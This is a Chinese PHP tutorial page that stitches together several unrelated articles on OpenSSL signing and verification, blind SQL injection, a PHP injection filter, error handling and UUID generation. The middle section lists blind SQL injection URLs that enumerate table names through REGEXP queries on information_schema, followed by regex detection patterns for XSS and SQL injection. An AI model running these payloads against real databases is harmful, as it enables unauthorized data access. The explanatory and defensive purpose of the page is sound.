php利用openssl生成签名实例程序

前面我有讲过利用其它的算法生成签名，下面我们同样在利用openssl生成签名，希望此文章对各位同学会有所帮助哦。

实例

代码如下

复制代码

<?php     /**      * 根据原文生成签名内容      *      * @param string $data 原文内容      *      * @return string      */     function sign($strData)     {         $filePath = 'test.pfx';         if(!file_exists($filePath)) {             return false;         }           $pkcs12 = file_get_contents($filePath);         if (openssl_pkcs12_read($pkcs12, $certs, '')) {             $privateKey = $certs['pkey'];             $publicKey = $certs['cert'];             $signedMsg = "";             if (openssl_sign($strData, $signedMsg, $privateKey)) {         $signedMsg=bin2hex($signedMsg);                 return $signedMsg;             } else {                 return '';             }         } else {             return '0';         }     }     /*       openssl_pkcs12_read 可以读取pfx格式的私钥,而不需要非要转成pem格式的文件     */ ?>

openssl_sign 默认signature_alg参数是OPENSSL_ALGO_SHA1
如果使用DSA加密方式需要使用OPENSSL_ALGO_DSS1参数
signature_alg 其他参数

OPENSSL_ALGO_DSS1 (integer)
OPENSSL_ALGO_SHA1 (integer)
OPENSSL_ALGO_SHA224 (integer)
OPENSSL_ALGO_SHA256 (integer)
OPENSSL_ALGO_SHA384 (integer)
OPENSSL_ALGO_SHA512 (integer)
OPENSSL_ALGO_RMD160 (integer)
OPENSSL_ALGO_MD5 (integer)
OPENSSL_ALGO_MD4 (integer)
OPENSSL_ALGO_MD2 (integer)

正则表达式注入攻击你sql数据库本人是第一次听过了，下面我总结了一些常见的sql攻击正则表达式同时在文章最后也举了一个实例与大家一起分析攻击原理。

我们都已经知道，在MYSQL 5+中 information_schema库中存储了所有的 库名，表明以及字段名信息。故攻击方式如下：

1. 判断第一个表名的第一个字符是否是a-z中的字符,其中blind_sqli是假设已知的库名。

注：正则表达式中 ^[a-z] 表示字符串中开始字符是在 a-z范围内

代码如下	复制代码
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1) /*

2. 判断第一个字符是否是a-n中的字符

代码如下	复制代码
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables  WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)/*

3. 确定该字符为n

代码如下	复制代码
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables  WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^n' LIMIT 0,1) /* www.111cn.net

4. 表达式的更换如下

代码如下	复制代码
expression like this:  '^n[a-z]' -> '^ne[a-z]' -> '^new[a-z]' -> '^news[a-z]' -> FALSE

这时说明表名为news ，要验证是否是该表明 正则表达式为'^news$'，但是没这必要 直接判断 table_name = ’news‘ 不就行了。

5.接下来猜解其它表了 只需要修改 limit 1,1 -> limit 2,1就可以对接下来的表进行盲注了。

例

代码如下

复制代码

$Exec_Commond  = "( \s|\S)*(exec(\s|\+)+(s|x)p\w+)(\s|\S)*"; $Simple_XSS = "( \s|\S)*((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)(\s|\S)*"; $Eval_XSS  = "( \s|\S)*((%65)|e)(\s)*((%76)|v)(\s)*((%61)|a)(\s)*((%6C)|l)(\s|\S)*"; $Image_XSS  = "( \s|\S)*((%3C)|<)((%69)|i|I|(%49))((%6D)|m|M|(%4D))((%67)|g|G|(%47))[^\n]+((%3E)|>)(\s|\S)*" ; $Script_XSS = "( \s|\S)*((%73)|s)(\s)*((%63)|c)(\s)*((%72)|r)(\s)*((%69)|i)(\s)*((%70)|p)(\s)*((%74)|t)(\s|\S)*"; $SQL_Injection = "( \s|\S)*((%27)|(')|(%3D)|(=)|(/)|(%2F)|(")|((%22)|(-|%2D){2})|(%23)|(%3B)|(;))+(\s|\S)*";

sql攻击代码

代码如下

复制代码

<?php function customError($errno, $errstr, $errfile, $errline) {     echo "<b>Error number:</b> [$errno],error on line $errline in $errfile<br />";     die(); } set_error_handler("customError",E_ERROR); $getfilter="'|(and|or)\b.+?(>|<|=|in|like)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)"; $postfilter="\b(and|or)\b.{1,6}?(=|>|<|\bin\b|\blike\b)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)"; $cookiefilter="\b(and|or)\b.{1,6}?(=|>|<|\bin\b|\blike\b)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)"; function StopAttack($StrFiltKey,$StrFiltValue,$ArrFiltReq) {        if(is_array($StrFiltValue))     {         $StrFiltValue=implode($StrFiltValue);     }     if (preg_match("/".$ArrFiltReq."/is",$StrFiltValue)==1&&!isset($_REQUEST['securityToken']))     {         slog("<br><br>操作IP: ".$_SERVER["REMOTE_ADDR"]."<br>操作时间: ".strftime("%Y-%m-%d %H:%M:%S")."<br>操作页面:".$_SERVER["PHP_SELF"]."<br>提交方式: ".$_SERVER["REQUEST_METHOD"]."<br>提交参数: ".$StrFiltKey."<br>提交数据: ".$StrFiltValue);         print "result notice:Illegal operation!";         exit();     } } foreach($_GET as $key=>$value) {     StopAttack($key,$value,$getfilter); } foreach($_POST as $key=>$value) {     StopAttack($key,$value,$postfilter); } foreach($_COOKIE as $key=>$value) {     StopAttack($key,$value,$cookiefilter); }    function slog($logs) {     $toppath="log.htm";     $Ts=fopen($toppath,"a+");     fputs($Ts,$logs."rn");     fclose($Ts); } ?>

sql

分析　　

如果使用这个函数的话，这个函数会绕开PHP的标准出错处理，所以说得自己定义报错处理程序(die())。

其次，如果代码执行前就发生了错误，那个时候用户自定义的程序还没有执行，所以就不会用到用户自己写的报错处理程序。　

　　那么，PHP里有一套错误处理机制，可以使用set_error_handler()接管PHP错误处理，也可以使用trigger_error()函数主动抛出一个错误。

　　set_error_handler()函数设置用户自定义的错误处理函数。函数用于创建运行期间的用户自己的错误处理方法。它需要先创建一个错误处理函数，然后设置错误级别。　　　

关于的用法：

代码如下	复制代码
function customError($errno, $errstr, $errfile, $errline) { 　　echo "<b>错误代码:</b> ［${errno}］ ${errstr}＼r＼n"; 　　echo " 错误所在的代码行： {$errline} 文件{$errfile}＼r＼n";  9　　 echo " PHP版本 ",PHP_VERSION, "(" , PHP_OS, ")＼r＼n"; 　　// die(); } set_error_handler("customError",E_ALL| E_STRICT);

总结                                                                                                                                                              

PHP遇到错误时，就会给出出错脚本的位置、行数和原因，有很多人说，这并没有什么大不了。但泄露了实际路径的后果是不堪设想的，对于某些入侵者，这个信息可是非常重要，而事实上现在有很多的服务器都存在这个问题。 有些网管干脆把PHP配置文件中的 display_errors 设置为 Off 来解决，但本人认为这个方法过于消极。有些时候，我们的确需要PHP返回错误的信息以便调试。而且在出错时也可能需要给用户一个交待，甚至导航到另一页面。但是有了set_error_handler()之后，这些矛盾也都可以解决掉了。
但是发现很少用这个函数。

下面我们一起来看看关于php 使用openssl_verify验证签名实例程序，希望本文章对各位同学会有所帮助。

代码如下

复制代码

<?php /**   * 验证签名   * TobeVerified 待验证签名的密文   * PlainText 待验证签名的明文   * CertFile 签名者公钥证书   * return 验证成功返回true，失败返回false(从LastErrMsg属性获取失败原因)   */ function VerifyMsg($TobeVerified, $PlainText, $CertFile,$signature_alg=OPENSSL_ALGO_SHA1) {       //用公钥验签     $fp=fopen($CertFile,"r");     if(!$fp)     {         //echo "Error Number:-10005, Error Description: ER_FIND_CERT_FAILED（找不到证书）";         return false;     }     $pub_key=fread($fp,8192);     fclose($fp);     $res = openssl_get_publickey($pub_key);     if (1==openssl_verify($PlainText,pack("H" . strlen($TobeVerified), $TobeVerified) , $res,$signature_alg))     {         //print("www.111cn.net提示您：验证成功"." <br>");         return true;     }     else     {         //echo "Error Number:-10021, Error Description: ER_VERIFY_ERROR（验签失败）|".openssl_error_string();         return false;     }   }   ?>

openssl_verify 可能有三个返回值1,0,-1，只有返回1表示验证签名成功。

$signature_alg 默认OPENSSL_ALGO_SHA1 ，如果是DSA加密要设置成OPENSSL_ALGO_DSS1

文章给大家介绍基于openssl使用DSA算法生成签名实例，生成签名方法很简单，我们需要懂得中间的原理就比较复杂了，大家一起来看看吧。

命令:

openssl> dgst -dss1 -sign C.pri -out signature.bin s.txt

解释
C.pri是DSA算法生成的私钥文件
s.txt是制作签名的原文
signature.bin是生成的签名文件

php中可以使用下面的方法察看签名内容

代码如下	复制代码
<?php echo bin2hex(file_get_contents('signature.bin')); ?>

参考内容
消息摘要算法
支持的算法包括：MD2, MD4, MD5, MDC2, SHA1(有时候叫做DSS1), RIPEMD-160。SHA1和RIPEMD-160产生160位哈西值,其他的产生128位。除非出于兼容性考虑，否则推荐使用SHA1或者RIPEMD-160。
除了RIPEMD-160需要用rmd160命令外，其他的算法都可用dgst命令来执行。
OpenSSL对于SHA1的处理有点奇怪，有时候必须把它称作DSS1来引用。
消息摘要算法除了可计算哈西值，还可用于签名和验证签名。签名的时候，对于DSA生成的私匙必须要和DSS1(即SHA1)搭配。而对于RSA生成的私匙，任何消息摘要算法都可使用。

# 消息摘要算法应用例子
# 用SHA1算法计算文件file.txt的哈西值，输出到stdout
$ openssl dgst -sha1 file.txt
# 用SHA1算法计算文件file.txt的哈西值,输出到文件digest.txt
$ openssl sha1 -out digest.txt file.txt
# 用DSS1(SHA1)算法为文件file.txt签名,输出到文件dsasign.bin
# 签名的private key必须为DSA算法产生的，保存在文件dsakey.pem中
$ openssl dgst -dss1 -sign dsakey.pem -out dsasign.bin file.txt
# 用dss1算法验证file.txt的数字签名dsasign.bin，
# 验证的private key为DSA算法产生的文件dsakey.pem
$ openssl dgst -dss1 -prverify dsakey.pem -signature dsasign.bin file.txt
# 用sha1算法为文件file.txt签名,输出到文件rsasign.bin
# 签名的private key为RSA算法产生的文件rsaprivate.pem
$ openssl sha1 -sign rsaprivate.pem -out rsasign.bin file.txt
# 用sha1算法验证file.txt的数字签名rsasign.bin，
# 验证的public key为RSA算法生成的rsapublic.pem
$ openssl sha1 -verify rsapublic.pem -signature rsasign.bin file.txt

uuid是什么格式的字符串我想很多朋友不知道，但是你己经来了估计就清楚什么是uuid了，下面我们一起来看看如何生成uuid字符串吧。

UUID是指在一台机器上生成的数字，它保证对在同一时空中的所有机器都是唯一的。通常平台会提供生成UUID的API。UUID按照开放软件基金会(OSF)制定的标准计算，用到了以太网卡地址、纳秒级时间、芯片ID码和许多可能的数字。由以下几部分的组合：当前日期和时间(UUID的第一个部分与时间有关，如果你在生成一个UUID之后，过几秒又生成一个UUID，则第一个部分不同，其余相同)，时钟序列，全局唯一的IEEE机器识别号（如果有网卡，从网卡获得，没有网卡以其他方式获得），UUID的唯一缺陷在于生成的结果串会比较长。关于UUID这个标准使用最普遍的是微软的GUID(Globals Unique Identifiers)。
在ColdFusion中可以用CreateUUID()函数很简单的生成UUID，其格式为：xxxxxxxx-xxxx-xxxx- xxxxxxxxxxxxxxxx(8-4-4-16)，其中每个 x 是 0-9 或 a-f 范围内的一个十六进制的数字。而标准的UUID格式为：xxxxxxxx-xxxx-xxxx-xxxxxx-xxxxxxxxxx (8-4-4-4-12)

代码如下

复制代码

<?php function guid(){     if (function_exists('com_create_guid')){         return com_create_guid();     }else{         mt_srand((double)microtime()*10000); //optional for php 4.2.0 and up.         $charid = strtoupper(md5(uniqid(rand(), true)));         $hyphen = chr(45); // "-"         $uuid = chr(123) // "{"                 .substr($charid, 0, 8).$hyphen                 .substr($charid, 8, 4).$hyphen                 .substr($charid,12, 4).$hyphen                 .substr($charid,16, 4).$hyphen                 .substr($charid,20,12)                 .chr(125); // "}"         return $uuid;     } } ?>